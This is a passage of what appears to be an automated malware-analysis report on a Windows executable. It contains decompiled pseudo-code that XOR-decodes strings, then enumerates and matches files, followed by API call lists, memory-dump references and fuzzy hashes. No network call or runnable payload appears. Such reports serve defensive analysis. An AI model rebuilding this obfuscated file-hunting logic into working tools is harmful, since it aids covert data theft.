    								if(_t121 == 0x30) {
    									L21:
    									__eflags = _t168[0];
    									if(_t168[0] == 0) {
    										goto L28;
    									}
    									L22:
    									_t122 = 0;
    									__eflags =  *_t168;
    									if( *_t168 == 0) {
    										goto L28;
    									} else {
    										goto L23;
    									}
    									do {
    										L23:
    										_t122[_t168] = _t122[_t168] ^ 0x00000019;
    										_t122 =  &(_t122[1]);
    										__eflags = _t122[_t168];
    									} while (_t122[_t168] != 0);
    									__eflags = _t122;
    									if(_t122 > 0) {
    										_t169 =  &_v580;
    										_t123 = 0x57;
    										E004159A4(_t123,  &_v580);
    										_push(_t157);
    										_push(_v676);
    										_t158 = _v656;
    										_push(_v652);
    										_push(_v672);
    										_t126 = E00417114(_t169, 0x311, _v656, _t169);
    										_t174 = _t174 + 0x14;
    										__eflags = _t126;
    										if(_t126 > 0) {
    											_t170 = _a4;
    											_t127 = E00416815(_t126, _t170, _t158);
    											__eflags = _t127;
    											if(_t127 != 0) {
    												_t68 = _t170 + 4;
    												 *_t68 =  &(( *(_t170 + 4))[1]);
    												__eflags =  *_t68;
    											}
    										}
    									}
    									goto L28;
    								}
    								__eflags = _t121 - 0x31;
    								if(_t121 != 0x31) {
    									goto L22;
    								}
    								goto L21;
    							}
    							_v648 =  &(_t156[6]);
    							E00414B91();
    							_t157 = E00416AA0(_v648,  &_v588, 0);
    							__eflags = _t157 - 1;
    							if(_t157 < 1) {
    								goto L15;
    							}
    							__eflags = _t157 - 0xffff;
    							if(_t157 <= 0xffff) {
    								goto L16;
    							}
    							goto L15;
    							L28:
    							_v644 = _v644 + 1;
    							__eflags = _v644 - _v648;
    						} while (_v644 < _v648);
    					}
    					goto L29;
    				} else {
    					_t171 =  &_v612;
    					E004159A4(0x90, _t171);
    					_v648 = _t171;
    					E0041BB58( &_v524,  &_v648, _t177, 1, 5, E00414BAB, _a4, 0, 0, 0);
    					goto L31;
    				}
    			}

    APIs
      • Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3
    • StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 00414CD1
    • StrStrIA.SHLWAPI(?,?), ref: 00414CE3
    • StrStrIA.SHLWAPI(?,?), ref: 00414CF3
    • StrStrIA.SHLWAPI(?,?), ref: 00414D05
      • Part of subcall function 0041BB58: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB97
      • Part of subcall function 0041BB58: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BBBE
      • Part of subcall function 0041BB58: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BC08
      • Part of subcall function 0041BB58: Sleep.KERNEL32(00000000,?,?), ref: 0041BC65
      • Part of subcall function 0041BB58: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC93
      • Part of subcall function 0041BB58: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BCA5
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
    • String ID:
    • API String ID: 1075381090-0
    • Opcode ID: 86b492fb9664b964d6276b9eadd936ccce854ea690ef4204226fa320a6bf3925
    • Instruction ID: cd4031350fba1f2ecaa8d00206ee9d8fdb259dcf368f291073119a17e474faa0
    • Opcode Fuzzy Hash: 86b492fb9664b964d6276b9eadd936ccce854ea690ef4204226fa320a6bf3925
    • Instruction Fuzzy Hash: 367188715083519FDB21DF29D801ADFB7E5AFC4718F00091EF884A72A2D738D9868B9A
    Uniqueness

    Uniqueness Score: -1.00%